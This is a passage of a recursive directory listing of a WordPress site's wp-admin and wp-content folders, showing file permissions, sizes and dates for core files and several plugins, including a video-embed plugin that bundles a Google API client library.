drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  14K Jun  3  2016 colors.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors.min.css
-rw-r--r-- 1 root root  14K Jun  3  2016 colors-rtl.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors-rtl.min.css
-rw-r--r-- 1 root root  157 Jun  3  2016 colors.scss

/var/www/https/blogblog/wp-admin/css/colors/sunrise:
total 68K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  14K Jun  3  2016 colors.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors.min.css
-rw-r--r-- 1 root root  14K Jun  3  2016 colors-rtl.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors-rtl.min.css
-rw-r--r-- 1 root root  166 Jun  3  2016 colors.scss

/var/www/https/blogblog/wp-admin/images:
total 388K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  147 Jun  3  2016 align-center-2x.png
-rw-r--r-- 1 root root  546 Jun  3  2016 align-center.png
-rw-r--r-- 1 root root  143 Jun  3  2016 align-left-2x.png
-rw-r--r-- 1 root root  554 Jun  3  2016 align-left.png
-rw-r--r-- 1 root root  121 Jun  3  2016 align-none-2x.png
-rw-r--r-- 1 root root  417 Jun  3  2016 align-none.png
-rw-r--r-- 1 root root  142 Jun  3  2016 align-right-2x.png
-rw-r--r-- 1 root root  509 Jun  3  2016 align-right.png
-rw-r--r-- 1 root root  863 Jun  3  2016 arrows-2x.png
-rw-r--r-- 1 root root  243 Jun  3  2016 arrows.png
-rw-r--r-- 1 root root  507 Jun  3  2016 bubble_bg-2x.gif
-rw-r--r-- 1 root root  398 Jun  3  2016 bubble_bg.gif
-rw-r--r-- 1 root root  258 Jun  3  2016 comment-grey-bubble-2x.png
-rw-r--r-- 1 root root  114 Jun  3  2016 comment-grey-bubble.png
-rw-r--r-- 1 root root  996 Jun  3  2016 date-button-2x.gif
-rw-r--r-- 1 root root  400 Jun  3  2016 date-button.gif
-rw-r--r-- 1 root root  719 Jun  3  2016 generic.png
-rw-r--r-- 1 root root  22K Jun  3  2016 icons32-2x.png
-rw-r--r-- 1 root root 7.9K Jun  3  2016 icons32.png
-rw-r--r-- 1 root root  21K Jun  3  2016 icons32-vs-2x.png
-rw-r--r-- 1 root root 7.9K Jun  3  2016 icons32-vs.png
-rw-r--r-- 1 root root 7.5K Jun  3  2016 imgedit-icons-2x.png
-rw-r--r-- 1 root root 4.0K Jun  3  2016 imgedit-icons.png
-rw-r--r-- 1 root root 1.5K Jun  3  2016 list-2x.png
-rw-r--r-- 1 root root 1003 Jun  3  2016 list.png
-rw-r--r-- 1 root root 2.3K Jun  3  2016 loading.gif
-rw-r--r-- 1 root root  360 Jun  3  2016 marker.png
-rw-r--r-- 1 root root 2.0K Jun  3  2016 mask.png
-rw-r--r-- 1 root root  850 Jun  3  2016 media-button-2x.png
-rw-r--r-- 1 root root  200 Jun  3  2016 media-button-image.gif
-rw-r--r-- 1 root root  206 Jun  3  2016 media-button-music.gif
-rw-r--r-- 1 root root  248 Jun  3  2016 media-button-other.gif
-rw-r--r-- 1 root root  323 Jun  3  2016 media-button.png
-rw-r--r-- 1 root root  133 Jun  3  2016 media-button-video.gif
-rw-r--r-- 1 root root  13K Jun  3  2016 menu-2x.png
-rw-r--r-- 1 root root 5.0K Jun  3  2016 menu.png
-rw-r--r-- 1 root root  13K Jun  3  2016 menu-vs-2x.png
-rw-r--r-- 1 root root 5.0K Jun  3  2016 menu-vs.png
-rw-r--r-- 1 root root  755 Jun  3  2016 no.png
-rw-r--r-- 1 root root 5.1K Jun  3  2016 post-formats32.png
-rw-r--r-- 1 root root 5.0K Jun  3  2016 post-formats32-vs.png
-rw-r--r-- 1 root root 2.2K Jun  3  2016 post-formats.png
-rw-r--r-- 1 root root 2.4K Jun  3  2016 post-formats-vs.png
-rw-r--r-- 1 root root  234 Jun  3  2016 resize-2x.gif
-rw-r--r-- 1 root root   70 Jun  3  2016 resize.gif
-rw-r--r-- 1 root root  233 Jun  3  2016 resize-rtl-2x.gif
-rw-r--r-- 1 root root  149 Jun  3  2016 resize-rtl.gif
-rw-r--r-- 1 root root  120 Jun  3  2016 se.png
-rw-r--r-- 1 root root   97 Jun  3  2016 sort-2x.gif
-rw-r--r-- 1 root root   55 Jun  3  2016 sort.gif
-rw-r--r-- 1 root root 8.4K Jun  3  2016 spinner-2x.gif
-rw-r--r-- 1 root root 4.1K Jun  3  2016 spinner.gif
-rw-r--r-- 1 root root 1.3K Jun  3  2016 stars-2x.png
-rw-r--r-- 1 root root  924 Jun  3  2016 stars.png
-rw-r--r-- 1 root root 6.0K Jun  3  2016 wheel.png
-rw-r--r-- 1 root root 3.1K Jun  3  2016 w-logo-blue.png
-rw-r--r-- 1 root root 4.1K Jun  3  2016 w-logo-white.png
-rw-r--r-- 1 root root 2.5K Jun  3  2016 wordpress-logo.png
-rw-r--r-- 1 root root 1.5K Jun  3  2016 wordpress-logo.svg
-rw-r--r-- 1 root root 1.5K Jun  3  2016 wordpress-logo-white.svg
-rw-r--r-- 1 root root 9.0K Jun  3  2016 wpspin_light-2x.gif
-rw-r--r-- 1 root root 2.2K Jun  3  2016 wpspin_light.gif
-rw-r--r-- 1 root root  825 Jun  3  2016 xit-2x.gif
-rw-r--r-- 1 root root  181 Jun  3  2016 xit.gif
-rw-r--r-- 1 root root  539 Jun  3  2016 yes.png

/var/www/https/blogblog/wp-admin/includes:
total 2.0M
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 2.4K Jun  3  2016 admin.php
-rw-r--r-- 1 root root  81K Jun  3  2016 ajax-actions.php
-rw-r--r-- 1 root root 8.6K Jun  3  2016 bookmark.php
-rw-r--r-- 1 root root  27K Jun  3  2016 class-ftp.php
-rw-r--r-- 1 root root 5.4K Jun  3  2016 class-ftp-pure.php
-rw-r--r-- 1 root root 8.4K Jun  3  2016 class-ftp-sockets.php
-rw-r--r-- 1 root root 192K Jun  3  2016 class-pclzip.php
-rw-r--r-- 1 root root  23K Jun  3  2016 class-wp-comments-list-table.php
-rw-r--r-- 1 root root  22K Jun  3  2016 class-wp-filesystem-base.php
-rw-r--r-- 1 root root  11K Jun  3  2016 class-wp-filesystem-direct.php
-rw-r--r-- 1 root root  13K Jun  3  2016 class-wp-filesystem-ftpext.php
-rw-r--r-- 1 root root 9.6K Jun  3  2016 class-wp-filesystem-ftpsockets.php
-rw-r--r-- 1 root root  14K Jun  3  2016 class-wp-filesystem-ssh2.php
-rw-r--r-- 1 root root 6.7K Jun  3  2016 class-wp-importer.php
-rw-r--r-- 1 root root 6.0K Jun  3  2016 class-wp-links-list-table.php
-rw-r--r-- 1 root root  30K Jun  3  2016 class-wp-list-table.php
-rw-r--r-- 1 root root  19K Jun  3  2016 class-wp-media-list-table.php
-rw-r--r-- 1 root root  16K Jun  3  2016 class-wp-ms-sites-list-table.php
-rw-r--r-- 1 root root  16K Jun  3  2016 class-wp-ms-themes-list-table.php
-rw-r--r-- 1 root root 9.8K Jun  3  2016 class-wp-ms-users-list-table.php
-rw-r--r-- 1 root root  16K Jun  3  2016 class-wp-plugin-install-list-table.php
-rw-r--r-- 1 root root  25K Jun  3  2016 class-wp-plugins-list-table.php
-rw-r--r-- 1 root root  45K Jun  3  2016 class-wp-posts-list-table.php
-rw-r--r-- 1 root root  47K Jun  3  2016 class-wp-press-this.php
-rw-r--r-- 1 root root  16K Jun  3  2016 class-wp-terms-list-table.php
-rw-r--r-- 1 root root  14K Jun  3  2016 class-wp-theme-install-list-table.php
-rw-r--r-- 1 root root 9.3K Jun  3  2016 class-wp-themes-list-table.php
-rw-r--r-- 1 root root 112K Jun  3  2016 class-wp-upgrader.php
-rw-r--r-- 1 root root  29K Jun  3  2016 class-wp-upgrader-skins.php
-rw-r--r-- 1 root root  13K Jun  3  2016 class-wp-users-list-table.php
-rw-r--r-- 1 root root 5.0K Jun  3  2016 comment.php
-rw-r--r-- 1 root root  18K Jun  3  2016 continents-cities.php
-rw-r--r-- 1 root root  47K Jun  3  2016 dashboard.php
-rw-r--r-- 1 root root  29K Jun  3  2016 deprecated.php
-rw-r--r-- 1 root root  18K Jun  3  2016 export.php
-rw-r--r-- 1 root root  48K Jun  3  2016 file.php
-rw-r--r-- 1 root root  30K Jun  3  2016 image-edit.php
-rw-r--r-- 1 root root  19K Jun  3  2016 image.php
-rw-r--r-- 1 root root 6.1K Jun  3  2016 import.php
-rw-r--r-- 1 root root 3.2K Jun  3  2016 list-table.php
-rw-r--r-- 1 root root  99K Jun  3  2016 media.php
-rw-r--r-- 1 root root 8.1K Jun  3  2016 menu.php
-rw-r--r-- 1 root root  46K Jun  3  2016 meta-boxes.php
-rw-r--r-- 1 root root  26K Jun  3  2016 misc.php
-rw-r--r-- 1 root root 2.0K Jun  3  2016 ms-deprecated.php
-rw-r--r-- 1 root root  34K Jun  3  2016 ms.php
-rw-r--r-- 1 root root  52K Jun  3  2016 nav-menu.php
-rw-r--r-- 1 root root  23K Jun  3  2016 plugin-install.php
-rw-r--r-- 1 root root  66K Jun  3  2016 plugin.php
-rw-r--r-- 1 root root  55K Jun  3  2016 post.php
-rw-r--r-- 1 root root  14K Jun  3  2016 revision.php
-rw-r--r-- 1 root root  34K Jun  3  2016 schema.php
-rw-r--r-- 1 root root  32K Jun  3  2016 screen.php
-rw-r--r-- 1 root root 7.6K Jun  3  2016 taxonomy.php
-rw-r--r-- 1 root root  80K Jun  3  2016 template.php
-rw-r--r-- 1 root root 6.3K Jun  3  2016 theme-install.php
-rw-r--r-- 1 root root  21K Jun  3  2016 theme.php
-rw-r--r-- 1 root root 8.1K Jun  3  2016 translation-install.php
-rw-r--r-- 1 root root  48K Jun  3  2016 update-core.php
-rw-r--r-- 1 root root  17K Jun  3  2016 update.php
-rw-r--r-- 1 root root  78K Jun  3  2016 upgrade.php
-rw-r--r-- 1 root root  15K Jun  3  2016 user.php
-rw-r--r-- 1 root root 8.3K Jun  3  2016 widgets.php

/var/www/https/blogblog/wp-admin/js:
total 1.0M
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 2.1K Jun  3  2016 accordion.js
-rw-r--r-- 1 root root  585 Jun  3  2016 accordion.min.js
-rw-r--r-- 1 root root 4.3K Jun  3  2016 bookmarklet.js
-rw-r--r-- 1 root root 2.3K Jun  3  2016 bookmarklet.min.js
-rw-r--r-- 1 root root 4.6K Jun  3  2016 color-picker.js
-rw-r--r-- 1 root root 2.7K Jun  3  2016 color-picker.min.js
-rw-r--r-- 1 root root 1.5K Jun  3  2016 comment.js
-rw-r--r-- 1 root root 1.2K Jun  3  2016 comment.min.js
-rw-r--r-- 1 root root  24K Jun  3  2016 common.js
-rw-r--r-- 1 root root  13K Jun  3  2016 common.min.js
-rw-r--r-- 1 root root 1.9K Jun  3  2016 custom-background.js
-rw-r--r-- 1 root root  900 Jun  3  2016 custom-background.min.js
-rw-r--r-- 1 root root 1.5K Jun  3  2016 custom-header.js
-rw-r--r-- 1 root root  82K Jun  3  2016 customize-controls.js
-rw-r--r-- 1 root root  36K Jun  3  2016 customize-controls.min.js
-rw-r--r-- 1 root root  59K Jun  3  2016 customize-widgets.js
-rw-r--r-- 1 root root  25K Jun  3  2016 customize-widgets.min.js
-rw-r--r-- 1 root root 5.7K Jun  3  2016 dashboard.js
-rw-r--r-- 1 root root 3.2K Jun  3  2016 dashboard.min.js
-rw-r--r-- 1 root root  18K Jun  3  2016 edit-comments.js
-rw-r--r-- 1 root root  11K Jun  3  2016 edit-comments.min.js
-rw-r--r-- 1 root root  34K Jun  3  2016 editor-expand.js
-rw-r--r-- 1 root root  14K Jun  3  2016 editor-expand.min.js
-rw-r--r-- 1 root root  11K Jun  3  2016 editor.js
-rw-r--r-- 1 root root 5.9K Jun  3  2016 editor.min.js
-rw-r--r-- 1 root root 7.6K Jun  3  2016 farbtastic.js
-rw-r--r-- 1 root root 5.4K Jun  3  2016 gallery.js
-rw-r--r-- 1 root root 3.7K Jun  3  2016 gallery.min.js
-rw-r--r-- 1 root root  15K Jun  3  2016 image-edit.js
-rw-r--r-- 1 root root 9.0K Jun  3  2016 image-edit.min.js
-rw-r--r-- 1 root root  11K Jun  3  2016 inline-edit-post.js
-rw-r--r-- 1 root root 7.0K Jun  3  2016 inline-edit-post.min.js
-rw-r--r-- 1 root root 3.7K Jun  3  2016 inline-edit-tax.js
-rw-r--r-- 1 root root 2.6K Jun  3  2016 inline-edit-tax.min.js
-rw-r--r-- 1 root root  22K Jun  3  2016 iris.min.js
-rw-r--r-- 1 root root  625 Jun  3  2016 language-chooser.js
-rw-r--r-- 1 root root  374 Jun  3  2016 language-chooser.min.js
-rw-r--r-- 1 root root 2.2K Jun  3  2016 link.js
-rw-r--r-- 1 root root 1.7K Jun  3  2016 link.min.js
-rw-r--r-- 1 root root  769 Jun  3  2016 media-gallery.js
-rw-r--r-- 1 root root  537 Jun  3  2016 media-gallery.min.js
-rw-r--r-- 1 root root 2.8K Jun  3  2016 media.js
-rw-r--r-- 1 root root 1.8K Jun  3  2016 media.min.js
-rw-r--r-- 1 root root 2.0K Jun  3  2016 media-upload.js
-rw-r--r-- 1 root root 1.2K Jun  3  2016 media-upload.min.js
-rw-r--r-- 1 root root  40K Jun  3  2016 nav-menu.js
-rw-r--r-- 1 root root  21K Jun  3  2016 nav-menu.min.js
-rw-r--r-- 1 root root 2.3K Jun  3  2016 password-strength-meter.js
-rw-r--r-- 1 root root  737 Jun  3  2016 password-strength-meter.min.js
-rw-r--r-- 1 root root 2.3K Jun  3  2016 plugin-install.js
-rw-r--r-- 1 root root 1.5K Jun  3  2016 plugin-install.min.js
-rw-r--r-- 1 root root 5.0K Jun  3  2016 postbox.js
-rw-r--r-- 1 root root 3.5K Jun  3  2016 postbox.min.js
-rw-r--r-- 1 root root  27K Jun  3  2016 post.js
-rw-r--r-- 1 root root  17K Jun  3  2016 post.min.js
-rw-r--r-- 1 root root  22K Jun  3  2016 press-this.js
-rw-r--r-- 1 root root 9.4K Jun  3  2016 press-this.min.js
-rw-r--r-- 1 root root  33K Jun  3  2016 revisions.js
-rw-r--r-- 1 root root  18K Jun  3  2016 revisions.min.js
-rw-r--r-- 1 root root  777 Jun  3  2016 set-post-thumbnail.js
-rw-r--r-- 1 root root  525 Jun  3  2016 set-post-thumbnail.min.js
-rw-r--r-- 1 root root 5.4K Jun  3  2016 svg-painter.js
-rw-r--r-- 1 root root 2.4K Jun  3  2016 svg-painter.min.js
-rw-r--r-- 1 root root 4.9K Jun  3  2016 tags-box.js
-rw-r--r-- 1 root root 2.7K Jun  3  2016 tags-box.min.js
-rw-r--r-- 1 root root 2.6K Jun  3  2016 tags.js
-rw-r--r-- 1 root root 1.6K Jun  3  2016 tags.min.js
-rw-r--r-- 1 root root  44K Jun  3  2016 theme.js
-rw-r--r-- 1 root root  21K Jun  3  2016 theme.min.js
-rw-r--r-- 1 root root  16K Jun  3  2016 updates.js
-rw-r--r-- 1 root root 8.4K Jun  3  2016 updates.min.js
-rw-r--r-- 1 root root 4.5K Jun  3  2016 user-profile.js
-rw-r--r-- 1 root root 2.9K Jun  3  2016 user-profile.min.js
-rw-r--r-- 1 root root 1.1K Jun  3  2016 user-suggest.js
-rw-r--r-- 1 root root  679 Jun  3  2016 user-suggest.min.js
-rw-r--r-- 1 root root  14K Jun  3  2016 widgets.js
-rw-r--r-- 1 root root 8.4K Jun  3  2016 widgets.min.js
-rw-r--r-- 1 root root 1023 Jun  3  2016 word-count.js
-rw-r--r-- 1 root root  582 Jun  3  2016 word-count.min.js
-rw-r--r-- 1 root root  16K Jun  3  2016 wp-fullscreen.js
-rw-r--r-- 1 root root 8.5K Jun  3  2016 wp-fullscreen.min.js
-rw-r--r-- 1 root root  628 Jun  3  2016 xfn.js
-rw-r--r-- 1 root root  441 Jun  3  2016 xfn.min.js

/var/www/https/blogblog/wp-admin/maint:
total 16K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 5.4K Jun  3  2016 repair.php

/var/www/https/blogblog/wp-admin/network:
total 196K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  342 Jun  3  2016 about.php
-rw-r--r-- 1 root root  949 Jun  3  2016 admin.php
-rw-r--r-- 1 root root  346 Jun  3  2016 credits.php
-rw-r--r-- 1 root root  934 Jun  3  2016 edit.php
-rw-r--r-- 1 root root  348 Jun  3  2016 freedoms.php
-rw-r--r-- 1 root root 2.9K Jun  3  2016 index.php
-rw-r--r-- 1 root root 4.2K Jun  3  2016 menu.php
-rw-r--r-- 1 root root  358 Jun  3  2016 plugin-editor.php
-rw-r--r-- 1 root root  469 Jun  3  2016 plugin-install.php
-rw-r--r-- 1 root root  346 Jun  3  2016 plugins.php
-rw-r--r-- 1 root root  351 Jun  3  2016 profile.php
-rw-r--r-- 1 root root  18K Jun  3  2016 settings.php
-rw-r--r-- 1 root root  344 Jun  3  2016 setup.php
-rw-r--r-- 1 root root 8.4K Jun  3  2016 site-info.php
-rw-r--r-- 1 root root 6.7K Jun  3  2016 site-new.php
-rw-r--r-- 1 root root 7.5K Jun  3  2016 site-settings.php
-rw-r--r-- 1 root root 8.8K Jun  3  2016 sites.php
-rw-r--r-- 1 root root 7.5K Jun  3  2016 site-themes.php
-rw-r--r-- 1 root root  12K Jun  3  2016 site-users.php
-rw-r--r-- 1 root root  356 Jun  3  2016 theme-editor.php
-rw-r--r-- 1 root root  466 Jun  3  2016 theme-install.php
-rw-r--r-- 1 root root  12K Jun  3  2016 themes.php
-rw-r--r-- 1 root root  350 Jun  3  2016 update-core.php
-rw-r--r-- 1 root root  537 Jun  3  2016 update.php
-rw-r--r-- 1 root root 4.6K Jun  3  2016 upgrade.php
-rw-r--r-- 1 root root  350 Jun  3  2016 user-edit.php
-rw-r--r-- 1 root root 4.0K Jun  3  2016 user-new.php
-rw-r--r-- 1 root root  12K Jun  3  2016 users.php

/var/www/https/blogblog/wp-admin/user:
total 40K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  275 Jun  3  2016 about.php
-rw-r--r-- 1 root root  841 Jun  3  2016 admin.php
-rw-r--r-- 1 root root  279 Jun  3  2016 credits.php
-rw-r--r-- 1 root root  281 Jun  3  2016 freedoms.php
-rw-r--r-- 1 root root  269 Jun  3  2016 index.php
-rw-r--r-- 1 root root  700 Jun  3  2016 menu.php
-rw-r--r-- 1 root root  270 Jun  3  2016 profile.php
-rw-r--r-- 1 root root  268 Jun  3  2016 user-edit.php

/var/www/https/blogblog/wp-content:
total 20K
drwxr-xr-x 5 root     root     4.0K Jun  4  2016 .
drwxr-xr-x 5 root     root     4.0K Jun  4  2016 ..
drwxr-xr-x 6 root     root     4.0K Jun  5  2016 plugins
drwxr-xr-x 9 root     root     4.0K Jun  4  2016 themes
drwxrwxrwx 2 www-data www-data 4.0K Jul 22 21:38 uploads

/var/www/https/blogblog/wp-content/plugins:
total 28K
drwxr-xr-x 6 root root 4.0K Jun  5  2016 .
drwxr-xr-x 5 root root 4.0K Jun  4  2016 ..
drwxr-xr-x 3 root root 4.0K Oct 14  2015 advanced-video-embed-embed-videos-or-playlists
drwxr-xr-x 4 root root 4.0K Jun  3  2016 akismet
-rw-r--r-- 1 root root 2.3K Jun  3  2016 hello.php
drwxr-xr-x 7 root root 4.0K Nov 12  2015 shortcode-ui
drwxr-xr-x 6 root root 4.0K Apr 12  2016 two-factor

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists:
total 20K
drwxr-xr-x 3 root root 4.0K Oct 14  2015 .
drwxr-xr-x 6 root root 4.0K Jun  5  2016 ..
-rw-r--r-- 1 root root 2.4K Oct 14  2015 advanced_video_embed.php
drwxr-xr-x 8 root root 4.0K Oct 14  2015 inc
-rw-r--r-- 1 root root 3.1K Oct 14  2015 readme.txt

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc:
total 36K
drwxr-xr-x 8 root root 4.0K Oct 14  2015 .
drwxr-xr-x 3 root root 4.0K Oct 14  2015 ..
-rw-r--r-- 1 root root  328 Oct 14  2015 aveloadContent.php
drwxr-xr-x 2 root root 4.0K Jun  4  2016 classes
drwxr-xr-x 2 root root 4.0K Oct 14  2015 css
drwxr-xr-x 2 root root 4.0K Oct 14  2015 img
drwxr-xr-x 2 root root 4.0K Oct 14  2015 js
drwxr-xr-x 2 root root 4.0K Oct 14  2015 views
drwxr-xr-x 3 root root 4.0K Oct 14  2015 youtube

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/classes:
total 20K
drwxr-xr-x 2 root root 4.0K Jun  4  2016 .
drwxr-xr-x 8 root root 4.0K Oct 14  2015 ..
-rw-r--r-- 1 root root 3.6K Oct 14  2015 class.avePost.php
-rw-r--r-- 1 root root 3.9K Oct 14  2015 class.aveSettings.php
-rw-r--r-- 1 root root 1.8K Oct 14  2015 class.aveShortcodes.php

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/css:
total 16K
drwxr-xr-x 2 root root 4.0K Oct 14  2015 .
drwxr-xr-x 8 root root 4.0K Oct 14  2015 ..
-rw-r--r-- 1 root root 6.3K Oct 14  2015 ave.css

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/img:
total 36K
drwxr-xr-x 2 root root 4.0K Oct 14  2015 .
drwxr-xr-x 8 root root 4.0K Oct 14  2015 ..
-rw-r--r-- 1 root root  21K Oct 14  2015 loading.gif
-rw-r--r-- 1 root root 1.9K Oct 14  2015 LOGO_AVE.png

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/js:
total 48K
drwxr-xr-x 2 root root 4.0K Oct 14  2015 .
drwxr-xr-x 8 root root 4.0K Oct 14  2015 ..
-rw-r--r-- 1 root root 7.3K Oct 14  2015 ave_load.js
-rw-r--r-- 1 root root  29K Oct 14  2015 masonry.js

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/views:
total 16K
drwxr-xr-x 2 root root 4.0K Oct 14  2015 .
drwxr-xr-x 8 root root 4.0K Oct 14  2015 ..
-rw-r--r-- 1 root root 2.5K Oct 14  2015 search_panel.php
-rw-r--r-- 1 root root 1.1K Oct 14  2015 setting.php

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/youtube:
total 16K
drwxr-xr-x  3 root root 4.0K Oct 14  2015 .
drwxr-xr-x  8 root root 4.0K Oct 14  2015 ..
drwxr-xr-x 12 root root 4.0K Oct 14  2015 Google
-rwxr-xr-x  1 root root 3.0K Oct 14  2015 search.php

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/youtube/Google:
total 112K
drwxr-xr-x 12 root root 4.0K Oct 14  2015 .
drwxr-xr-x  3 root root 4.0K Oct 14  2015 ..
drwxr-xr-x  2 root root 4.0K Oct 14  2015 Auth
-rw-r--r--  1 root root 1.1K Oct 14  2015 autoload.php
drwxr-xr-x  2 root root 4.0K Oct 14  2015 Cache
-rw-r--r--  1 root root  20K Oct 14  2015 Client.php
-rw-r--r--  1 root root 2.6K Oct 14  2015 Collection.php
-rw-r--r--  1 root root  14K Oct 14  2015 Config.php
-rw-r--r--  1 root root  647 Oct 14  2015 Exception.php
drwxr-xr-x  2 root root 4.0K Oct 14  2015 Http
drwxr-xr-x  2 root root 4.0K Oct 14  2015 IO
drwxr-xr-x  2 root root 4.0K Oct 14  2015 Logger
-rw-r--r--  1 root root 8.0K Oct 14  2015 Model.php
drwxr-xr-x  2 root root 4.0K Oct 14  2015 Service
-rw-r--r--  1 root root 1.3K Oct 14  2015 Service.php
drwxr-xr-x  2 root root 4.0K Oct 14  2015 Signer
drwxr-xr-x  2 root root 4.0K Oct 14  2015 Task
drwxr-xr-x  2 root root 4.0K Oct 14  2015 Utils
-rw-r--r--  1 root root 3.9K Oct 14  2015 Utils.php
drwxr-xr-x  2 root root 4.0K Oct 14  2015 Verifier

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/youtube/Google/Auth:
total 60K
drwxr-xr-x  2 root root 4.0K Oct 14  2015 .
drwxr-xr-x 12 root root 4.0K Oct 14  2015 ..
-rw-r--r--  1 root root 1.3K Oct 14  2015 Abstract.php
-rw-r--r--  1 root root 3.5K Oct 14  2015 AppIdentity.php
-rw-r--r--  1 root root 3.8K Oct 14  2015 AssertionCredentials.php
-rw-r--r--  1 root root 4.2K Oct 14  2015 ComputeEngine.php
-rw-r--r--  1 root root  755 Oct 14  2015 Exception.php
-rw-r--r--  1 root root 1.9K Oct 14  2015 LoginTicket.php
-rw-r--r--  1 root root  19K Oct 14  2015 OAuth2.php
-rw-r--r--  1 root root 2.0K Oct 14  2015 Simple.php

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/youtube/Google/Cache:
total 40K
drwxr-xr-x  2 root root 4.0K Oct 14  2015 .
drwxr-xr-x 12 root root 4.0K Oct 14  2015 ..
-rw-r--r--  1 root root 1.5K Oct 14  2015 Abstract.php
-rw-r--r--  1 root root 2.8K Oct 14  2015 Apc.php
-rw-r--r--  1 root root  756 Oct 14  2015 Exception.php
-rw-r--r--  1 root root 5.6K Oct 14  2015 File.php
-rw-r--r--  1 root root 4.8K Oct 14  2015 Memcache.php
-rw-r--r--  1 root root 1.2K Oct 14  2015 Null.php

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/youtube/Google/Http:
total 56K
drwxr-xr-x  2 root root 4.0K Oct 14  2015 .
drwxr-xr-x 12 root root 4.0K Oct 14  2015 ..
-rw-r--r--  1 root root 4.4K Oct 14  2015 Batch.php
-rw-r--r--  1 root root 6.1K Oct 14  2015 CacheParser.php
-rw-r--r--  1 root root 8.2K Oct 14  2015 MediaFileUpload.php
-rw-r--r--  1 root root  12K Oct 14  2015 Request.php
-rw-r--r--  1 root root 5.6K Oct 14  2015 REST.php

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/youtube/Google/IO:
total 172K
drwxr-xr-x  2 root root 4.0K Oct 14  2015 .
drwxr-xr-x 12 root root 4.0K Oct 14  2015 ..
-rw-r--r--  1 root root  11K Oct 14  2015 Abstract.php
-rw-r--r--  1 root root 132K Oct 14  2015 cacerts.pem
-rw-r--r--  1 root root 5.3K Oct 14  2015 Curl.php
-rw-r--r--  1 root root 1.8K Oct 14  2015 Exception.php
-rw-r--r--  1 root root 6.4K Oct 14  2015 Stream.php

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/youtube/Google/Logger:
total 36K
drwxr-xr-x  2 root root 4.0K Oct 14  2015 .
drwxr-xr-x 12 root root 4.0K Oct 14  2015 ..
-rw-r--r--  1 root root  10K Oct 14  2015 Abstract.php
-rw-r--r--  1 root root  757 Oct 14  2015 Exception.php
-rw-r--r--  1 root root 3.6K Oct 14  2015 File.php
-rw-r--r--  1 root root 1.1K Oct 14  2015 Null.php
-rw-r--r--  1 root root 2.5K Oct 14  2015 Psr.php

/var/www/https/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/inc/youtube/Google/Service:
total 5.6M
drwxr-xr-x  2 root root 4.0K Oct 14  2015 .
drwxr-xr-x 12 root root 4.0K Oct 14  2015 ..
-rw-r--r--  1 root root  58K Oct 14  2015 AdExchangeBuyer.php
-rw-r--r--  1 root root  46K Oct 14  2015 AdExchangeSeller.php
-rw-r--r--  1 root root 4.4K Oct 14  2015 Admin.php
-rw-r--r--  1 root root  61K Oct 14  2015 AdSenseHost.php
-rw-r--r--  1 root root 100K Oct 14  2015 AdSense.php
-rw-r--r--  1 root root 270K Oct 14  2015 Analytics.php
-rw-r--r--  1 root root  91K Oct 14  2015 AndroidEnterprise.php
-rw-r--r--  1 root root 124K Oct 14  2015 AndroidPublisher.php
-rw-r--r--  1 root root  15K Oct 14  2015 Appsactivity.php
-rw-r--r--  1 root root  11K Oct 14  2015 AppState.php
-rw-r--r--  1 root root 9.9K Oct 14  2015 Audit.php
-rw-r--r--  1 root root  36K Oct 14  2015 Autoscaler.php
-rw-r--r--  1 root root  93K Oct 14  2015 Bigquery.php
-rw-r--r--  1 root root  89K Oct 14  2015 Blogger.php
-rw-r--r--  1 root root 175K Oct 14  2015 Books.php
-rw-r--r--  1 root root 111K Oct 14  2015 Calendar.php
-rw-r--r--  1 root root  38K Oct 14  2015 CivicInfo.php
-rw-r--r--  1 root root  50K Oct 14  2015 Classroom.php
-rw-r--r--  1 root root 7.0K Oct 14  2015 Cloudlatencytest.php
-rw-r--r--  1 root root  34K Oct 14  2015 CloudMonitoring.php
-rw-r--r--  1 root root  14K Oct 14  2015 Cloudresourcemanager.php
-rw-r--r--  1 root root 1.4K Oct 14  2015 Cloudsearch.php
-rw-r--r--  1 root root  53K Oct 14  2015 CloudUserAccounts.php
-rw-r--r--  1 root root  46K Oct 14  2015 Computeaccounts.php
